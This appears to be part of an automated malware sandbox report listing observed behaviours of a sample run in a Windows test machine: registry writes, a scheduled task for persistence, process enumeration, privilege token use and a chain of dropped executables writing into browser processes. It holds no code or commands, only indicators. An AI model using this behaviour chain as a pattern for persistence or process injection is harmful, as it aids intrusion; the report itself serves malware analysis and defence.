Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133857100048501121" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\notepad.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10110320101\1d96b73593.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110370101\781a56e4da.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10110390101\e8635ad464.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe
PID 1316 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1316 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 1316 wrote to memory of 4732 N/A C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4732 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 4732 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 4732 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe
PID 1488 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1488 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 760 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
